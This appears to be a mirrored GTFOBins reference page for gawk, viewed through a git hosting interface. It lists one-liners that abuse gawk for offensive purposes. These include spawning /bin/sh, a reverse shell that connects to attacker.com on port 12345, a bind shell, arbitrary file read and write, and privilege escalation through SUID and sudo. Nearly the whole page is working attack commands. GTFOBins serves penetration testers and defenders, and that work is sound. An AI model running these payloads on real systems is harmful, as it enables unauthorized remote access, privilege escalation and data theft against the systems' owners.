mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
Code Issues
master
GTFOBins.github.io/_gtfobins/gawk.md
Nick Blekherman 31b69cfeed
Add SUID category to gawk as file read
2021-01-18 09:46:51 +02:00

1.2 KiB
Raw Permalink Blame History

functions
shell non-interactive-reverse-shell non-interactive-bind-shell file-write file-read suid sudo limited-suid
code
gawk 'BEGIN {system("/bin/sh")}'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 gawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 gawk -v LPORT=$LPORT 'BEGIN { s = "/inet/tcp/" LPORT "/0/0"; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
code
LFILE=file_to_write gawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
code
LFILE=file_to_read gawk '//' "$LFILE"
code
LFILE=file_to_read ./gawk '//' "$LFILE"
code
sudo gawk 'BEGIN {system("/bin/sh")}'
code
./gawk 'BEGIN {system("/bin/sh")}'